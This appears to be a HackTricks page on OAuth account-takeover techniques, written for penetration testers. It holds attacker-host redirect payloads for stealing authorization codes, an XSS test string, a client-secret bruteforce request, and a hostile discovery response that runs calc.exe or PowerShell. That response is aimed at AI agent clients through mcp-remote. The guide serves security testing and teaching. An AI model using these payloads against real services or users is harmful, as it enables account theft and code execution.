OAuth to Account takeover
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
OAuth offers various versions, with foundational insights accessible at OAuth 2.0 documentation. This discussion primarily centers on the widely used OAuth 2.0 authorization code grant type, providing an authorization framework that enables an application to access or perform actions on a user’s account in another application (the authorization server).
Consider a hypothetical website https://example.com, designed to showcase all your social media posts, including private ones. To achieve this, OAuth 2.0 is employed. https://example.com will request your permission to access your social media posts. Consequently, a consent screen will appear on https://socialmedia.com, outlining the permissions being requested and the developer making the request. Upon your authorization, https://example.com gains the ability to access your posts on your behalf.
It’s essential to grasp the following components within the OAuth 2.0 framework:
- `resource owner`: You, the user/entity who authorizes access to a resource, like your social media account posts.
- `resource server`: The server handling authenticated requests after the application has secured an `access token` on behalf of the `resource owner`, e.g., https://socialmedia.com.
- `client application`: The application seeking authorization from the `resource owner`, such as https://example.com.
- `authorization server`: The server that issues `access token`s to the `client application` after successfully authenticating the `resource owner` and securing authorization, e.g., https://socialmedia.com.
- `client_id`: A public, unique identifier for the application.
- `client_secret`: A confidential key, known solely to the application and the authorization server, used for generating `access_token`s.
- `response_type`: A value specifying the type of token requested, like `code`.
- `scope`: The level of access the `client application` is requesting from the `resource owner`.
- `redirect_uri`: The URL to which the user is redirected after authorization. This typically must align with the pre-registered redirect URL.
- `state`: A parameter to maintain data across the user’s redirection to and from the authorization server. Its uniqueness is critical for serving as a CSRF protection mechanism.
- `grant_type`: A parameter indicating the grant type and the type of token to be returned.
- `code`: The authorization code from the `authorization server`, used together with `client_id` and `client_secret` by the client application to acquire an `access_token`.
- `access_token`: The token that the client application uses for API requests on behalf of the `resource owner`.
- `refresh_token`: Enables the application to obtain a new `access_token` without re-prompting the user.
Flow
The actual OAuth flow proceeds as follows:
- You navigate to https://example.com and select the “Integrate with Social Media” button.
- The site then sends a request to https://socialmedia.com asking for your authorization to let https://example.com’s application access your posts. The request is structured as:
https://socialmedia.com/auth
?response_type=code
&client_id=example_clientId
&redirect_uri=https%3A%2F%2Fexample.com%2Fcallback
&scope=readPosts
&state=randomString123
- You are then presented with a consent page.
- Following your approval, Social Media sends a response to the `redirect_uri` with the `code` and `state` parameters:
https://example.com?code=uniqueCode123&state=randomString123
- https://example.com uses this `code`, together with its `client_id` and `client_secret`, to make a server-side request to obtain an `access_token` on your behalf, enabling access to the permissions you consented to:
POST /oauth/access_token
Host: socialmedia.com
...

{"client_id": "example_clientId", "client_secret": "example_clientSecret", "code": "uniqueCode123", "grant_type": "authorization_code"}
- Finally, the process concludes as https://example.com uses your `access_token` to make API calls to Social Media to access your posts on your behalf.
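The full flow above can be sketched in a few lines. The endpoints and credentials below are the hypothetical ones from the example, not a real provider:

```python
from urllib.parse import urlencode

# Hypothetical values taken from the example flow above.
AUTHORIZE_URL = "https://socialmedia.com/auth"
CLIENT_ID = "example_clientId"
REDIRECT_URI = "https://example.com/callback"

def build_authorization_url(state, scope="readPosts"):
    """Step 2: the URL the user's browser is sent to for consent."""
    params = {
        "response_type": "code",
        "client_id": CLIENT_ID,
        "redirect_uri": REDIRECT_URI,
        "scope": scope,
        "state": state,
    }
    return AUTHORIZE_URL + "?" + urlencode(params)

def build_token_request(code, client_secret):
    """Step 5: the server-side body POSTed to /oauth/access_token."""
    return {
        "client_id": CLIENT_ID,
        "client_secret": client_secret,
        "code": code,
        "grant_type": "authorization_code",
    }
```

Note that only `build_authorization_url` output ever reaches the browser; the token request carries the `client_secret` and must stay server-side.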
Vulnerabilities
Open redirect_uri
Per RFC 6749 §3.1.2, the authorization server must redirect the browser only to pre-registered, exact redirect URIs. Any weakness here lets an attacker send a victim through a malicious authorization URL so that the IdP delivers the victim’s code (and state) straight to an attacker endpoint, who can then redeem it and harvest tokens.
Typical attack workflow:
- Craft `https://idp.example/auth?...&redirect_uri=https://attacker.tld/callback` and send it to the victim.
- The victim authenticates and approves the scopes.
- The IdP redirects to `attacker.tld/callback?code=<victim-code>&state=...`, where the attacker logs the request and immediately exchanges the code.
Common validation bugs to probe:
- No validation – any absolute URL is accepted, resulting in instant code theft.
- Weak substring/regex checks on the host – bypass with lookalikes such as `evilmatch.com`, `match.com.evil.com`, `match.com.mx`, `matchAmatch.com`, `evil.com#match.com`, or `match.com@evil.com`.
- IDN homograph mismatches – validation happens on the punycode form (`xn--`), but the browser redirects to the Unicode domain controlled by the attacker.
- Arbitrary paths on an allowed host – pointing `redirect_uri` to `/openredirect?next=https://attacker.tld` or any XSS/user-content endpoint leaks the code through chained redirects, Referer headers, or injected JavaScript.
- Directory constraints without normalization – patterns like `/oauth/*` can be bypassed with `/oauth/../anything`.
- Wildcard subdomains – accepting `*.example.com` means any takeover (dangling DNS, S3 bucket, etc.) immediately yields a valid callback.
- Non-HTTPS callbacks – letting `http://` URIs through gives network attackers (Wi-Fi, corporate proxy) the opportunity to snatch the code in transit.
Also review auxiliary redirect-style parameters (client_uri, policy_uri, tos_uri, initiate_login_uri, etc.) and the OpenID discovery document (/.well-known/openid-configuration) for additional endpoints that might inherit the same validation bugs.
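To see why substring host checks fail, the sketch below (the `match.com` allowlist entry is hypothetical) shows every lookalike above passing a naive check while failing an exact-match comparison:

```python
def naive_host_check(redirect_uri, allowed="match.com"):
    """Flawed validator: substring match anywhere in the URI."""
    return allowed in redirect_uri

def strict_check(redirect_uri, registered="https://match.com/callback"):
    """Exact match against the pre-registered value, per RFC 6749."""
    return redirect_uri == registered

# Every payload targets an attacker host yet passes the naive check.
bypasses = [
    "https://evilmatch.com/callback",
    "https://match.com.evil.com/callback",
    "https://evil.com/#match.com",
    "https://match.com@evil.com/callback",
]
```

Exact string comparison against pre-registered URIs is the only check that survives all of these variants.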
Redirect token leakage on allowlisted domains with attacker-controlled subpaths
Locking redirect_uri to “owned/first-party domains” doesn’t help if any allowlisted domain exposes attacker-controlled paths or execution contexts (legacy app platforms, user namespaces, CMS uploads, etc.). If the OAuth/federated login flow returns tokens in the URL (query or hash), an attacker can:
- Start a legitimate flow to mint a pre-token (e.g., an `etoken` in a multi-step Accounts Center/FXAuth flow).
- Send the victim an authorization URL that sets the allowlisted domain as `redirect_uri`/`base_uri` but points `next`/path into an attacker-controlled namespace (e.g., `https://apps.facebook.com/<attacker_app>`).
- After the victim approves, the IdP redirects to the attacker-controlled path with sensitive values in the URL (`token`, `blob`, codes, etc.).
- JavaScript on that page reads `window.location` and exfiltrates the values despite the domain being “trusted.”
- Replay the captured values against downstream privileged endpoints that only expect the redirect-carried tokens. Examples from the FXAuth flow:
# Account linking without further prompts
https://accountscenter.facebook.com/add/?auth_flow=frl_linking&blob=<BLOB>&token=<TOKEN>
# Reauth-gated actions (e.g., profile updates) without user confirmation
https://accountscenter.facebook.com/profiles/<VICTIM_ID>/name/?auth_flow=reauth&blob=<BLOB>&token=<TOKEN>
XSS in redirect implementation
As mentioned in this bug bounty report https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html, the redirect URL might be reflected in the server’s response after the user authenticates, making it vulnerable to XSS. Possible payload to test:
https://app.victim.com/login?redirectUrl=https://app.victim.com/dashboard</script><h1>test</h1>
CSRF - Improper handling of state parameter
The state parameter is the Authorization Code flow CSRF token: the client must generate a cryptographically random value per browser instance, persist it somewhere only that browser can read (cookie, local storage, etc.), send it in the authorization request, and reject any response that does not return the same value. Whenever the value is static, predictable, optional, or not tied to the user’s session, the attacker can finish their own OAuth flow, capture the final ?code= request (without sending it), and later coerce a victim browser into replaying that request so the victim account becomes linked to the attacker’s identity provider profile.
The replay pattern is always the same:
- The attacker authenticates against the IdP with their account and intercepts the last redirect containing `code` (and any `state`).
- They drop that request, keep the URL, and later abuse any CSRF primitive (link, iframe, auto-submitting form) to force the victim browser to load it.
- If the client does not enforce `state`, the application consumes the attacker’s authorization result and logs the attacker into the victim’s app account.
A practical checklist for state handling during tests:
- Missing `state` entirely – if the parameter never appears, the whole login is CSRFable.
- `state` not required – remove it from the initial request; if the IdP still issues codes that the client accepts, the defense is opt-in.
- Returned `state` not validated – tamper with the value in the response (Burp, MITM proxy). Accepting mismatched values means the stored token is never compared.
- Predictable or purely data-driven `state` – many apps stuff redirect paths or JSON blobs into `state` without mixing in randomness, letting attackers guess valid values and replay flows. Always prepend/append strong entropy before encoding data.
- `state` fixation – if the app lets users supply the `state` value (e.g., via crafted authorization URLs) and reuses it throughout the flow, an attacker can lock in a known value and reuse it across victims.
PKCE can complement state (especially for public clients) by binding the authorization code to a code verifier, but web clients must still track state to prevent cross-user CSRF/account-linking bugs.
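A minimal sketch of correct client-side state handling — a random per-session value, compared in constant time on return — might look like:

```python
import hmac
import secrets

def new_state():
    """Mint a cryptographically random, per-browser-session CSRF token.
    Store it where only this browser's session can read it (cookie, etc.)."""
    return secrets.token_urlsafe(32)

def state_matches(stored, returned):
    """Reject the callback unless state is present and identical to the
    stored value; compare_digest avoids timing side channels."""
    if not stored or not returned:
        return False
    return hmac.compare_digest(stored, returned)
```

Any callback where `state_matches` is false must be discarded without redeeming the accompanying `code`.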
Pre Account Takeover
- Without Email Verification on Account Creation: Attackers can preemptively create an account using the victim’s email. If the victim later uses a third-party service for login, the application might inadvertently link this third-party account to the attacker’s pre-created account, leading to unauthorized access.
- Exploiting Lax OAuth Email Verification: Attackers may exploit OAuth services that don’t verify emails by registering with their service and then changing the account email to the victim’s. This method similarly risks unauthorized account access, akin to the first scenario but through a different attack vector.
Disclosure of Secrets
The client_id is intentionally public, but the client_secret must never be recoverable by end users. Authorization Code deployments that embed the secret in mobile APKs, desktop clients, or single-page apps effectively hand that credential to anyone who can download the package. Always inspect public clients by:
- Unpacking the APK/IPA, desktop installer, or Electron app and grepping for `client_secret`, Base64 blobs that decode to JSON, or hard-coded OAuth endpoints.
- Reviewing bundled config files (plist, JSON, XML) or decompiled strings for client credentials.
Once the attacker extracts the secret they only need to steal any victim authorization code (via a weak redirect_uri, logs, etc.) to independently hit /token and mint access/refresh tokens without involving the legitimate app. Treat public/native clients as incapable of holding secrets—they should instead rely on PKCE (RFC 7636) to prove possession of a per-instance code verifier instead of a static secret. During testing, confirm whether PKCE is mandatory and whether the backend actually rejects token exchanges that omit either the client_secret or a valid code_verifier.
Client Secret Bruteforce
You can try to bruteforce the client_secret that a service provider uses with the identity provider in order to steal accounts.
The request to BF may look similar to:
POST /token HTTP/1.1
content-type: application/x-www-form-urlencoded
host: 10.10.10.10:3000
content-length: 135
Connection: close
code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=authorization_code&client_id=public_client_id&client_secret=[bruteforce]
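The bruteforce loop can be sketched as below. The token endpoint is mocked here (with a hypothetical weak secret) so the logic is self-contained; in a real engagement each guess would be sent as the HTTP POST shown above:

```python
# Mock of the IdP's POST /token endpoint so the sketch runs offline;
# the weak secret is hypothetical.
REAL_SECRET = "s3cret"

def token_endpoint(body):
    """Stand-in for the real /token endpoint: 200 on a correct secret."""
    return 200 if body.get("client_secret") == REAL_SECRET else 401

def bruteforce_secret(candidates):
    """Replay the captured token request once per candidate secret."""
    base = {
        "code": "77515",
        "redirect_uri": "http://10.10.10.10:3000/callback",
        "grant_type": "authorization_code",
        "client_id": "public_client_id",
    }
    for guess in candidates:
        if token_endpoint({**base, "client_secret": guess}) == 200:
            return guess
    return None
```

In practice rate limiting and code expiry constrain this attack, so check whether the endpoint throttles failed exchanges at all.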
Referer/Header/Location artifacts leaking Code + State
Once the client has the code and state, if they surface in location.href or document.referrer and are forwarded to third parties, they leak. Two recurring patterns:
- Classic Referer leak: after the OAuth redirect, any navigation that keeps `?code=&state=` in the URL will push them into the Referer header sent to CDNs/analytics/ads.
- Telemetry/analytics confused deputy: some SDKs (pixels/JS loggers) react to `postMessage` events and then send the current `location.href`/referrer to backend APIs using a token supplied in the message. If you can inject your own token into that flow (e.g., via an attacker-controlled postMessage relay), you can later read the SDK’s API request history/logs and recover the victim’s OAuth artifacts embedded in those requests.
Access Token Stored in Browser History
The core guarantee of the Authorization Code grant is that access tokens never reach the resource owner’s browser. When implementations leak tokens client-side, any minor bug (XSS, Referer leak, proxy logging) becomes instant account compromise. Always check for:
- Tokens in URLs – if `access_token` appears in the query/fragment, it lands in browser history, server logs, analytics, and Referer headers sent to third parties.
- Tokens transiting untrusted middleboxes – returning tokens over HTTP or through debugging/corporate proxies lets network observers capture them directly.
- Tokens stored in JavaScript state – React/Vue stores, global variables, or serialized JSON blobs expose tokens to every script on the origin (including XSS payloads or malicious extensions).
- Tokens persisted in Web Storage – `localStorage`/`sessionStorage` retain tokens long after logout on shared devices and are script-accessible.
Any of these findings usually upgrades otherwise “low” bugs (like a CSP bypass or DOM XSS) into full API takeover because the attacker can simply read and replay the leaked bearer token.
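A quick helper for spotting the first finding (tokens in URLs) during triage; the parameter names are the common OAuth/OIDC ones, adjust for the target:

```python
from urllib.parse import parse_qs, urlsplit

# Common bearer-token parameter names; extend per target.
SENSITIVE = {"access_token", "id_token", "refresh_token"}

def leaked_tokens(url):
    """Return which bearer-token parameters appear in the query or
    fragment of a captured URL (both end up in history/logs)."""
    parts = urlsplit(url)
    found = set()
    for raw in (parts.query, parts.fragment):
        found |= SENSITIVE & set(parse_qs(raw))
    return found
```

Run it over proxy history exports to flag every URL that ever carried a token client-side.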
Everlasting Authorization Code
Authorization codes must be short-lived, single-use, and replay-aware. When assessing a flow, capture a code and:
- Test the lifetime – RFC 6749 recommends minutes, not hours. Try redeeming the code after 5–10 minutes; if it still works, the exposure window for any leaked code is excessive.
- Test sequential reuse – send the same `code` twice. If the second request yields another token, attackers can clone sessions indefinitely.
- Test concurrent redemption/race conditions – fire two token requests in parallel (Burp Intruder, Turbo Intruder). Weak issuers sometimes grant both.
- Observe replay handling – a reuse attempt should not only fail but also revoke any tokens already minted from that code. Otherwise, a detected replay leaves the attacker’s first token active.
Combining a replay-friendly code with any redirect_uri or logging bug allows persistent account access even after the victim completes the legitimate login.
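The issuer behavior this checklist expects can be modeled as below (the TTL value is illustrative): codes are single-use, expire quickly, and a replay attempt revokes the token already minted from the code:

```python
import time

class CodeStore:
    """Models a correct issuer: short-lived, single-use codes whose
    replay also revokes already-minted tokens."""
    TTL = 60  # seconds; illustrative — RFC 6749 recommends minutes at most

    def __init__(self):
        self._codes = {}   # code -> [issued_at, already_redeemed]
        self._tokens = {}  # code -> access token minted from it

    def issue(self, code, now=None):
        self._codes[code] = [now if now is not None else time.time(), False]

    def redeem(self, code, now=None):
        now = now if now is not None else time.time()
        entry = self._codes.get(code)
        if entry is None or now - entry[0] > self.TTL:
            return None                   # unknown or expired code
        if entry[1]:                      # replay detected:
            self._tokens.pop(code, None)  # revoke the earlier token too
            return None
        entry[1] = True
        token = "tok-" + code
        self._tokens[code] = token
        return token
```

When testing, any issuer that deviates from this model (second redemption succeeds, or the replay fails but the first token stays alive) is reportable.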
Authorization/Refresh Token not bound to client
If you can get the authorization code and redeem it for a different client/app, you can take over other accounts. Test for weak binding by:
- Capturing a `code` for app A and sending it to app B’s token endpoint; if you still receive a token, audience binding is broken.
- Trying first-party token minting endpoints that should be restricted to their own client IDs; if they accept arbitrary `state`/`app_id` while only validating the code, you effectively perform an authorization-code swap to mint higher-privileged first-party tokens.
- Checking whether client binding ignores nonce/redirect URI mismatches. If an error page still loads SDKs that log `location.href`, combine with Referer/telemetry leaks to steal codes and redeem them elsewhere.
Any endpoint that exchanges code → token must verify the issuing client, redirect URI, and nonce; otherwise, a stolen code from any app can be upgraded to a first-party access token.
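A sketch of the binding check a token endpoint should perform, comparing the exchange request against the values recorded when the code was issued (field names follow the standard parameters):

```python
def valid_exchange(code_record, request):
    """Accept the code -> token exchange only if the requesting client,
    redirect URI and nonce all match what was recorded at issuance."""
    return all(
        request.get(field) == code_record.get(field)
        for field in ("client_id", "redirect_uri", "nonce")
    )
```

Any endpoint where a mismatched `client_id` still yields a token is exactly the code-swap primitive described above.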
Happy Paths, XSS, Iframes & Post Messages to leak code & state values
AWS Cognito
In this bug bounty report: https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/ you can see that the token AWS Cognito gives back to the user might have enough permissions to overwrite the user data. Therefore, if you can change your user email to a different user’s email, you might be able to take over other users’ accounts.
# Read info of the user
aws cognito-idp get-user --region us-east-1 --access-token eyJraWQiOiJPVj[...]
# Change email address
aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ[...] --user-attributes Name=email,Value=imaginary@flickr.com
{
"CodeDeliveryDetailsList": [
{
"Destination": "i***@f***.com",
"DeliveryMedium": "EMAIL",
"AttributeName": "email"
}
]
}
For more detailed info about how to abuse AWS Cognito check AWS Cognito - Unauthenticated Enum Access.
Abusing other Apps’ tokens
As mentioned in this writeup, OAuth flows that expect to receive the token (and not a code) could be vulnerable if they do not check that the token belongs to the app.
This is because an attacker could create an application supporting OAuth and “Login with Facebook” (for example) in his own application. Then, once a victim logs in with Facebook in the attacker’s application, the attacker could take the OAuth token the user granted to his application and use it to log in to the victim’s account on the vulnerable application using the victim’s token.
Caution
Therefore, if the attacker manages to get the user to access his own OAuth application, he will be able to take over the victim’s account in applications that expect a token and don’t check whether the token was granted to their app ID.
Two links & cookie
According to this writeup, it was possible to make a victim open a page with a returnUrl pointing to the attacker’s host. This info would be stored in a cookie (RU), and in a later step the prompt would ask the user whether he wants to give access to that attacker’s host.
To bypass this prompt, it was possible to open a tab to initiate the OAuth flow (which would set this RU cookie using the returnUrl), close the tab before the prompt was shown, and open a new tab without that value. The prompt then wouldn’t mention the attacker’s host, but the cookie would still point to it, so the token would be sent to the attacker’s host in the redirection.
Prompt Interaction Bypass
As explained in this video, some OAuth implementations allow setting the prompt GET parameter to None (`&prompt=none`) to prevent users from being asked to confirm the given access in a prompt on the web if they are already logged in to the platform.
response_mode
As explained in this video, it might be possible to use the parameter response_mode to indicate where you want the code to be provided in the final URL:
- `response_mode=query` → The code is provided inside a GET parameter: `?code=2397rf3gu93f`
- `response_mode=fragment` → The code is provided inside the URL fragment: `#code=2397rf3gu93f`
- `response_mode=form_post` → The code is provided inside a POST form with an input called `code` holding the value
- `response_mode=web_message` → The code is sent in a post message: `window.opener.postMessage({"code": "asdasdasd...`
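A client consuming `query` or `fragment` mode callbacks might extract the code like this:

```python
from urllib.parse import parse_qs, urlsplit

def extract_code(callback_url):
    """Pull the authorization code from either the query string
    (response_mode=query) or the fragment (response_mode=fragment)."""
    parts = urlsplit(callback_url)
    for raw in (parts.query, parts.fragment):
        values = parse_qs(raw).get("code")
        if values:
            return values[0]
    return None
```

From an attacker’s perspective, forcing `fragment` mode matters because fragments never reach the server — only client-side JavaScript (including injected payloads) can read them.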
Clickjacking OAuth consent dialogs
OAuth consent/login dialogs are ideal clickjacking targets: if they can be framed, an attacker can overlay custom graphics, hide the real buttons, and trick users into approving dangerous scopes or linking accounts. Build PoCs that:
- Load the IdP authorization URL inside an `<iframe sandbox="allow-forms allow-scripts allow-same-origin">`.
- Use absolute positioning/opacity tricks to align fake buttons with the hidden Allow/Approve controls.
- Optionally pre-fill parameters (scopes, redirect URI) so the stolen approval immediately benefits the attacker.
During testing verify that IdP pages emit either X-Frame-Options: DENY/SAMEORIGIN or a restrictive Content-Security-Policy: frame-ancestors 'none'. If neither is present, demonstrate the risk with tooling like NCC Group’s clickjacking PoC generator and record how easily a victim authorizes the attacker’s app. For additional payload ideas see Clickjacking.
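The header check can be automated with a small helper (simplified: it treats the mere presence of a `frame-ancestors` directive as protection, without evaluating which origins that directive actually allows):

```python
def is_framable(headers):
    """True when neither X-Frame-Options nor a frame-ancestors CSP
    directive stops the consent page from being iframed."""
    h = {k.lower(): v for k, v in headers.items()}
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return False
    if "frame-ancestors" in h.get("content-security-policy", "").lower():
        return False
    return True
```

Feed it the response headers of the IdP authorization URL; a `True` result means the clickjacking PoC above is worth building.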
OAuth ROPC flow - 2 FA bypass
According to this blog post, this is an OAuth flow that allows logging in via username and password (Resource Owner Password Credentials). If this simple flow returns a token with access to all the actions the user can perform, then it’s possible to bypass 2FA using that token.
ATO on web page redirecting based on open redirect to referrer
This blog post explains how it was possible to abuse an open redirect to the Referer value in order to abuse OAuth for ATO. The attack was:
- The victim accesses the attacker’s web page.
- The victim opens the malicious link, and an opener starts the Google OAuth flow with `response_type=id_token,code&prompt=none` as additional parameters, using the attacker’s website as Referer.
- In the opener, after the provider authorizes the victim, it sends them back to the value of the `redirect_uri` parameter (the victim web) with a 30X code that still keeps the attacker’s website in the Referer.
- The victim website triggers the open redirect based on the Referer, redirecting the victim to the attacker’s website. As the `response_type` was `id_token,code`, the code is sent back to the attacker in the fragment of the URL, allowing him to take over the user’s account via Google on the victim’s site.
SSRFs parameters
Check this research for further details of this technique.
Dynamic Client Registration in OAuth serves as a less obvious but critical vector for security vulnerabilities, specifically for Server-Side Request Forgery (SSRF) attacks. This endpoint allows OAuth servers to receive details about client applications, including sensitive URLs that could be exploited.
Key Points:
- Dynamic Client Registration is often mapped to `/register` and accepts details like `client_name`, `client_secret`, `redirect_uris`, and URLs for logos or JSON Web Key Sets (JWKs) via POST requests.
- This feature adheres to specifications laid out in RFC7591 and OpenID Connect Registration 1.0, which include parameters potentially vulnerable to SSRF.
- The registration process can inadvertently expose servers to SSRF in several ways:
  - `logo_uri`: A URL for the client application’s logo that might be fetched by the server, triggering SSRF or leading to XSS if the URL is mishandled.
  - `jwks_uri`: A URL to the client’s JWK document, which, if maliciously crafted, can cause the server to make outbound requests to an attacker-controlled server.
  - `sector_identifier_uri`: References a JSON array of `redirect_uris`, which the server might fetch, creating an SSRF opportunity.
  - `request_uris`: Lists allowed request URIs for the client, which can be exploited if the server fetches these URIs at the start of the authorization process.
Exploitation Strategy:
- SSRF can be triggered by registering a new client with malicious URLs in parameters like `logo_uri`, `jwks_uri`, or `sector_identifier_uri`.
- While direct exploitation via `request_uris` may be mitigated by whitelist controls, supplying a pre-registered, attacker-controlled `request_uri` can facilitate SSRF during the authorization phase.
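A registration body for probing these fields might look like the sketch below, with every URL-valued parameter pointed at an attacker-observable host (the collaborator hostname is a placeholder):

```python
import json

def ssrf_registration_body(collaborator):
    """Dynamic Client Registration payload (RFC 7591 fields) with every
    URL-valued parameter pointed at an attacker-observable host; any
    server-side fetch of these URLs reveals the SSRF."""
    return json.dumps({
        "client_name": "ssrf-probe",
        "redirect_uris": ["https://" + collaborator + "/callback"],
        "logo_uri": "https://" + collaborator + "/logo.png",
        "jwks_uri": "https://" + collaborator + "/jwks.json",
        "sector_identifier_uri": "https://" + collaborator + "/sector.json",
    })
```

POST this to `/register` and watch the collaborator for inbound DNS/HTTP; each field that triggers a callback is a separate SSRF sink.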
OAuth/OIDC Discovery URL Abuse & OS Command Execution
Research on CVE-2025-6514 (impacting mcp-remote clients such as Claude Desktop, Cursor or Windsurf) shows how dynamic OAuth discovery becomes an RCE primitive whenever the client forwards IdP metadata straight to the operating system. The remote MCP server returns an attacker-controlled authorization_endpoint during the discovery exchange (/.well-known/openid-configuration or any metadata RPC). mcp-remote ≤0.1.15 would then call the system URL handler (start, open, xdg-open, etc.) with whatever string arrived, so any scheme/path supported by the OS executed locally.
Attack workflow
- Point the desktop agent to a hostile MCP/OAuth server (`npx mcp-remote https://evil`). The agent receives a `401` plus metadata.
- The server answers with JSON such as:
HTTP/1.1 200 OK
Content-Type: application/json
{
"authorization_endpoint": "file:/c:/windows/system32/calc.exe",
"token_endpoint": "https://evil/idp/token",
...
}
- The client launches the OS handler for the supplied URI. Windows accepts payloads like `file:/c:/windows/system32/calc.exe /c"powershell -enc ..."`; macOS/Linux accept `file:///Applications/Calculator.app/...` or even custom schemes such as `cmd://bash -lc '<payload>'` if registered.
- Because this happens before any user interaction, merely configuring the client to talk to the attacker server yields code execution.
How to test
- Target any OAuth-capable desktop/agent that performs discovery over HTTP(S) and opens returned endpoints locally (Electron apps, CLI helpers, thick clients).
- Intercept or host the discovery response and replace `authorization_endpoint`, `device_authorization_endpoint`, or similar fields with `file://`, `cmd://`, UNC paths, or other dangerous schemes.
- Observe whether the client validates the scheme/host. Lack of validation results in immediate execution under the user context and proves the issue.
- Repeat with different schemes to map the full attack surface (e.g., `ms-excel:`, `data:text/html,`, custom protocol handlers) and demonstrate cross-platform reach.
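Conversely, a hardened client should validate the scheme and host of every discovery-supplied endpoint before handing it anywhere near an OS URL handler. A minimal sketch of that check:

```python
from urllib.parse import urlsplit

def safe_endpoint(url):
    """Allow only https URLs with a real host; reject file:, cmd:,
    ms-excel:, UNC paths and anything else an OS handler might run."""
    parts = urlsplit(url)
    return parts.scheme == "https" and bool(parts.netloc)
```

Running the payloads from the workflow above through this check is a quick way to demonstrate which ones a vulnerable client would have executed.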
OAuth providers Race Conditions
If the platform you are testing is an OAuth provider read this to test for possible Race Conditions.
Mutable Claims Attack
In OAuth, the sub field uniquely identifies a user, but its format varies by Authorization Server. To standardize user identification, some clients use emails or user handles. However, this is risky because:
- Some Authorization Servers do not ensure that these properties (like email) remain immutable.
- In certain implementations—such as “Login with Microsoft”—the client relies on the email field, which is user-controlled in Entra ID and not verified.
- An attacker can exploit this by creating their own Azure AD organization (e.g., doyensectestorg) and using it to perform a Microsoft login.
- Even though the Object ID (stored in sub) is immutable and secure, the reliance on a mutable email field can enable an account takeover (for example, hijacking an account like victim@gmail.com).
Client Confusion Attack
In a Client Confusion Attack, an application using the OAuth Implicit Flow fails to verify that the final access token is specifically generated for its own Client ID. An attacker sets up a public website that uses Google’s OAuth Implicit Flow, tricking thousands of users into logging in and thereby harvesting access tokens intended for the attacker’s site. If these users also have accounts on another vulnerable website that does not validate the token’s Client ID, the attacker can reuse the harvested tokens to impersonate the victims and take over their accounts.
Scope Upgrade Attack
The Authorization Code Grant type involves secure server-to-server communication for transmitting user data. However, if the Authorization Server implicitly trusts a scope parameter in the Access Token Request (a parameter not defined in the RFC), a malicious application could upgrade the privileges of an authorization code by requesting a higher scope. After the Access Token is generated, the Resource Server must verify it: for JWT tokens, this involves checking the JWT signature and extracting data such as client_id and scope, while for random string tokens, the server must query the Authorization Server to retrieve the token’s details.
Redirect Scheme Hijacking
In mobile OAuth implementations, apps use custom URI schemes to receive redirects with Authorization Codes. However, because multiple apps can register the same scheme on a device, the assumption that only the legitimate client controls the redirect URI is violated. On Android, for instance, an Intent URI like `com.example.app://oauth` is caught based on the scheme and optional filters defined in an app’s intent-filter. Since Android’s intent resolution can be broad—especially if only the scheme is specified—an attacker can register a malicious app with a carefully crafted intent filter to hijack the authorization code. This can enable an account takeover either through user interaction (when multiple apps are eligible to handle the intent) or via bypass techniques that exploit overly specific filters, as detailed by Ostorlab’s assessment flowchart.
References
- Leaking FXAuth token via allowlisted Meta domains
- https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1
- https://portswigger.net/research/hidden-oauth-attack-vectors
- https://blog.doyensec.com/2025/01/30/oauth-common-vulnerabilities.html
- An Offensive Guide to the OAuth 2.0 Authorization Code Grant
- OAuth Discovery as an RCE Vector (Amla Labs)
- Leaking fbevents: OAuth code exfiltration via postMessage trust leading to Instagram ATO